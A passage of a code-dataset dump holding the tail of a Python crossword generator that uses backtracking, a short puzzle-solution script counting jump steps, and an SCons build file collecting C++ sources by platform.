store_list:\n down_list.append(item)\n break\n else:\n store_list.append(current_index)\n block = False\n else:\n if not block:\n for item in store_list:\n down_list.append(item)\n break\n #right\n current_index = index\n right_list = list()\n store_list = list()\n the_row = current_index//num_cols\n block = True\n for i in range(3):\n current_index += 1\n if current_index // num_cols == the_row :\n if board[current_index] == '#':\n if not block:\n for item in store_list:\n right_list.append(item)\n break\n else:\n store_list.append(current_index)\n block = False\n else:\n if not block:\n for item in store_list:\n right_list.append(item)\n break\n #left\n current_index = index\n left_list = list()\n store_list = list()\n block = True\n for i in range(3):\n current_index 
-= 1\n if current_index // num_cols == the_row:\n if board[current_index] == '#':\n if not block:\n for item in store_list:\n left_list.append(item)\n break\n else:\n store_list.append(current_index)\n block = False\n else:\n if not block:\n for item in store_list:\n left_list.append(item)\n break\n total_list = list()\n total_list.append(up_list)\n total_list.append(down_list)\n total_list.append(right_list)\n total_list.append(left_list)\n return sum(total_list,[])\n\n#checks if given index has at least length 3 surrounding it\ndef check_min_length(board, index, num_rows, num_cols):\n #up\n current_index = index\n block = True\n for i in range(3):\n current_index -= num_cols\n if current_index >= 0:\n if board[current_index] == '#':\n if not block:\n return False\n else:\n block = False\n else:\n if not block:\n return False\n #down\n current_index = index\n block = True\n for i in range(3):\n current_index += num_cols\n if current_index < len(board):\n if board[current_index] == '#':\n if not block:\n return False\n else:\n block = False\n else:\n if not block:\n return False\n #right\n current_index = index\n the_row = current_index//num_cols\n block = True\n for i in range(3):\n current_index += 1\n if current_index // num_cols == the_row:\n if board[current_index] == '#':\n if not block:\n return False\n else:\n block = False\n else:\n if not block:\n return False\n #left\n current_index = index\n block = True\n for i in range(3):\n current_index -= 1\n if current_index // num_cols == the_row:\n if board[current_index] == '#':\n if not block:\n return False\n else:\n block = False\n else:\n if not block:\n return False\n return True\n\n#checks if the entire board is at least min length 3\ndef check_board_min_length_3(board, num_rows, num_cols):\n if len(board) % 2 == 0:\n final_index = int(len(board)/2)\n else:\n final_index = int((len(board)-1)/2)\n for index, square in enumerate(board[:final_index]):\n if square == '#':\n if not check_min_length(board, index, num_rows, num_cols):\n return False\n return True\n\n#finds all implied squares in the board\ndef find_implied(board, num_rows, num_cols):\n total = list()\n if len(board) % 2 == 0:\n final_index = int(len(board)/2)\n else:\n final_index = int((len(board)-1)/2)\n for index, square in enumerate(board[:final_index]):\n if board[index] == '#':\n total.append(get_implied_squares(board, index, num_rows, num_cols))\n return sum(total,[])\n\n#conducts search to place down all implied squares\ndef place_implied_squares(board, num_rows, num_cols, cur_blocks, final_blocks):\n implied_squares = deque(find_implied(board, num_rows, num_cols))\n visited = set(implied_squares)\n if len(implied_squares) == 0:\n return board\n while implied_squares:\n new_index = implied_squares.pop()\n if cur_blocks >= final_blocks: #more implied blocks to place but already all blocks have been placed so return None\n return None\n symmetric_index = len(board) - (new_index + 1)\n if board[new_index] == '-' and board[symmetric_index] == '-':\n board[new_index] = \"#\"\n board[symmetric_index] = '#'\n if symmetric_index == new_index:\n cur_blocks += 1\n else:\n cur_blocks += 2\n for new_square in find_implied(board, num_rows, num_cols):\n if new_square not in visited:\n implied_squares.append(new_square)\n visited.add(new_square)\n if not check_board_min_length_3(board, num_rows, num_cols):#check if at least length 3 all over board\n return None\n return board\n\n#returns (index, symmetrical index) for all possible moves in board sorted by the 
heuristic\ndef possibleMoves(board, num_rows, num_cols):\n possible_moves = list()\n if len(board) % 2 == 0:\n final_index = int(len(board)/2)\n else:\n final_index = int((len(board)-1)/2)\n for index, square in enumerate(board[:final_index]):\n symmetrical_index = len(board) - (index + 1)\n if square == '-' and board[symmetrical_index] == '-':\n possible_moves.append((index, symmetrical_index))\n random.shuffle(possible_moves)\n return possible_moves\n\n#backtracking method to place blocking squares\ndef place_blocking_squares(board, num_rows, num_cols, cur_blocks, final_blocks, block_placed):\n if cur_blocks == final_blocks:\n if fully_connected(board, num_rows, num_cols): #only goal tests because blocks are placed symmetrically and min_3_length checked in implied block section\n return board\n else:\n return None\n if block_placed and not fully_connected(board, num_rows, num_cols):\n return None\n elif cur_blocks >= final_blocks:\n return None\n for index, symmetrical_index in possibleMoves(board, num_rows, num_cols):\n new_board = board.copy()\n new_board[index] = '#'\n new_board[symmetrical_index] = '#'\n new_board = place_implied_squares(new_board, num_rows, num_cols, board.count('#'), final_blocks)\n if new_board is not None:\n result = place_blocking_squares(new_board, num_rows, num_cols, new_board.count('#'), final_blocks, True)\n else:\n result = None\n if result is not None:\n return result\n return None\n\narg_list = sys.argv\n#rows and columns\nr_n_c = arg_list[1]\nnum_rows = int(r_n_c[:r_n_c.index('x')])\nnum_cols = int(r_n_c[r_n_c.index('x')+1:])\n#blocking squares\nnum_blocking_squares = int(arg_list[2])\n#dictionary file\ndictionary_file = arg_list[3]\n#extra words\nextra_words = list()\nif len(arg_list) > 4:\n for word in arg_list[4:]:\n direction = word[0].upper()\n row = int(word[1:word.index('x')])\n start_index = None\n for index, char in enumerate(word):\n if index <= word.index('x'):\n continue\n if not char.isnumeric():\n start_index = index\n break\n col = int(word[word.index('x')+1:start_index])\n legit_word = word[start_index:]\n extra_words.append((direction, row, col, legit_word.upper()))\n#create board\nboard = [\"-\"] * (num_rows*num_cols)\nadd_words_to_board(board, num_cols, extra_words)\ntemp_board = place_implied_squares(board, num_rows, num_cols, board.count('#'), num_blocking_squares)\nif num_rows * num_cols == num_blocking_squares:\n final_board = [\"#\"] * (num_rows*num_cols)\nelif num_rows % 2 == 1 and num_cols % 2 == 1 and num_blocking_squares % 2 == 1:\n coord = int((((num_cols - 1)/2) + (((num_rows - 1)/2) * num_cols)))\n board[coord] = '#'\n final_board = place_blocking_squares(temp_board, num_rows, num_cols, board.count('#'), num_blocking_squares, False)\nelse:\n final_board = place_blocking_squares(temp_board, num_rows, num_cols, board.count('#'), num_blocking_squares, False)\nboard = final_board\nprint_puzzle(board, num_cols)\n\n\"\"\"BEGINS WORD PLACING SECTION\"\"\"\n\n#return list of tuples of all wordspaces on the board\ndef find_all_wordspaces(board, num_rows, num_cols):\n wordspace_list = list()\n wordspace_indices = dict()\n #horizontal\n for i in range(0, len(board), num_cols):\n empty = False\n for j in range(0, num_cols):\n if board[i+j] != '#' and not empty:\n empty = True\n cur_start_index = i+j\n cur_length = 0\n store_indices = []\n if board[i+j] == '#' and empty:\n empty = False\n cur_stop_index = i+j-1 #THIS IS THE LAST INDEX WHERE THE EMPTY SPACE IS!!!! 
\n wordspace_list.append((cur_start_index, cur_stop_index, 'H', cur_length))\n wordspace_indices[(cur_start_index, cur_stop_index, 'H', cur_length)] = store_indices\n cur_length = 0\n if empty:\n cur_length += 1\n store_indices.append(i+j)\n if empty:\n empty = False\n cur_stop_index = i+j\n wordspace_list.append((cur_start_index, cur_stop_index, 'H', cur_length))\n wordspace_indices[(cur_start_index, cur_stop_index, 'H', cur_length)] = store_indices\n #vertical\n for i in range(0, num_cols):\n empty = False\n for j in range(0, len(board), num_cols):\n if board[i+j] != '#' and not empty:\n empty = True\n cur_start_index = i+j\n cur_length = 0\n store_indices = []\n if board[i+j] == '#' and empty:\n empty = False\n cur_stop_index = i+j-num_cols #THIS IS THE LAST INDEX WHERE THE EMPTY SPACE IS!!!! \n wordspace_list.append((cur_start_index, cur_stop_index, 'V', cur_length))\n wordspace_indices[(cur_start_index, cur_stop_index, 'V', cur_length)] = store_indices\n cur_length = 0\n if empty:\n store_indices.append(i+j)\n cur_length += 1\n if empty:\n empty = False\n cur_stop_index = i+j\n wordspace_list.append((cur_start_index, cur_stop_index, 'V', cur_length))\n wordspace_indices[(cur_start_index, cur_stop_index, 'V', cur_length)] = store_indices\n return wordspace_list, wordspace_indices\n \n#return list of words ordered by letter frequency\ndef order_by_letter_frequency(word):\n score = 0\n for char in word:\n score -= letter_count[char]\n return score\n\n#return the wordspace with the least amount of possibilities:\ndef most_constrained_wordspace(wordspace_dict):\n cur_min_wordspace = None\n cur_min_length = float('inf')\n for key in wordspace_dict.keys():\n if len(wordspace_dict[key]) < cur_min_length:\n cur_min_length = len(wordspace_dict[key])\n cur_min_wordspace = key\n return cur_min_wordspace\n\n#return list of words that correspond to that wordspace\ndef possibleWords(wordspace_dict, wordspace):\n return sorted(wordspace_dict[wordspace], key=order_by_letter_frequency)\n\n#update all the words in the dictionary that we affected\ndef update_other_words(wordspace_dict, wordspace, wordspace_indices, board, num_rows, num_cols):\n word = ''\n if wordspace[2] == 'H':\n for i in range(wordspace[0], wordspace[1]+1):\n word += board[i]\n else:\n for i in range(wordspace[0], wordspace[1]+1, num_cols):\n word += board[i]\n indices_to_check = wordspace_indices[wordspace]\n for new_wordspace, set_of_words in wordspace_dict.items():\n indices = wordspace_indices[new_wordspace]\n if new_wordspace != wordspace:\n wordspace_dict[new_wordspace].discard(word)\n if any(index in indices for index in indices_to_check) and wordspace[2] != new_wordspace[2]:\n common_index = set(indices).intersection(set(indices_to_check)).pop()\n intersect_index = indices.index(common_index) #the index of the other wordspace where it intersects with the current word\n for new_word in list(wordspace_dict[new_wordspace]):\n if new_word[intersect_index] != board[common_index] and board[common_index] != '-':\n wordspace_dict[new_wordspace].remove(new_word)\n return wordspace_dict\n \n#place a word on the board in a given wordspace \ndef place_word(board, wordspace, word, num_rows, num_cols):\n cur_index = 0\n if wordspace[2] == 'H':\n for i in range(wordspace[0], wordspace[1]+1):\n board[i] = word[cur_index]\n cur_index += 1\n else:\n for i in range(wordspace[0], wordspace[1]+1, num_cols):\n board[i] = word[cur_index]\n cur_index += 1\n\n#backtracking method to place words\ndef place_all_words(board, num_rows, num_cols, 
wordspace_dict, letter_count):\n if board.count('-') == 0 and not wordspace_dict:\n return board\n for key in wordspace_dict.keys():\n if not wordspace_dict[key]:\n return None\n wordspace = most_constrained_wordspace(wordspace_dict)\n for word in possibleWords(wordspace_dict, wordspace):\n new_board = board.copy()\n place_word(new_board, wordspace, word, num_rows, num_cols)\n new_wordspace_dict = {x: wordspace_dict[x].copy() for x in wordspace_dict}\n new_wordspace_dict.pop(wordspace)\n new_wordspace_dict = update_other_words(new_wordspace_dict, wordspace, wordspace_indices, new_board, num_rows, num_cols)\n result = place_all_words(new_board, num_rows, num_cols, new_wordspace_dict, letter_count)\n if result is not None:\n return result\n return None\n\n#read in file\nlen_dict = dict() #dict of len:set of words of that length\nwith open(dictionary_file) as f:\n for count, line in enumerate(f):\n word = line.split()[0]\n if (len(word) > num_rows and len(word) > num_cols) or (len(word) < 3):\n continue\n if len(word) in len_dict.keys():\n len_dict[len(word)].add(word.upper())\n else:\n len_dict[len(word)] = {word.upper()}\n\nletter_count = dict() #dict of letter:count\nwith open(dictionary_file) as f:\n text = f.read().upper()\n for char in text:\n if char in letter_count.keys():\n letter_count[char] += 1\n else:\n letter_count[char] = 1\n\nwordspaces_list, wordspace_indices = find_all_wordspaces(board, num_rows, num_cols)\nwordspace_dict = dict()\nfor wordspace in wordspaces_list:\n set_of_words = len_dict[wordspace[3]].copy()\n wordspace_dict[wordspace] = set_of_words\nfor wordspace in wordspaces_list:\n update_other_words(wordspace_dict, wordspace, wordspace_indices, board, num_rows, num_cols)\nfinal_board = place_all_words(board, num_rows, num_cols, wordspace_dict, letter_count)\nprint_puzzle(final_board, num_cols)","sub_path":"unit4-crossword/crossword2.py","file_name":"crossword2.py","file_ext":"py","file_size_in_byte":19009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"550035023","text":"def count_steps(squares, decreasing=False):\n \"\"\"Count the amount of steps required to exit the square sequence.\"\"\"\n pos = 0\n count = 0\n while pos >= 0 and pos < len(squares):\n prev = pos\n pos += squares[pos]\n squares[prev] += -1 if decreasing and squares[prev] >= 3 else 1\n count += 1\n return count\n\n\nif __name__ == \"__main__\":\n with open(\"input.txt\") as file:\n input = file.read().strip()\n squares = list(map(int, input.splitlines()))\n print(count_steps(squares[:]))\n print(count_steps(squares[:], True))\n","sub_path":"d05/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"649033177","text":"#!python\nimport os, subprocess\nImport('cbenv')\n\n## project includes\n#cbenv.Append(CPPPATH=[Dir(\"./\")])\n\n## os env\nenv_os = cbenv.Clone()\nenv_os.SOURCES = [ Glob('*.cpp') ]\n\n## source files\nExport('env_os')\nSConscript('%s/SConstruct'%env_os['platform']) ## windows, x11, osx\n\ncbenv.SOURCES += env_os.SOURCES\n","sub_path":"os/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}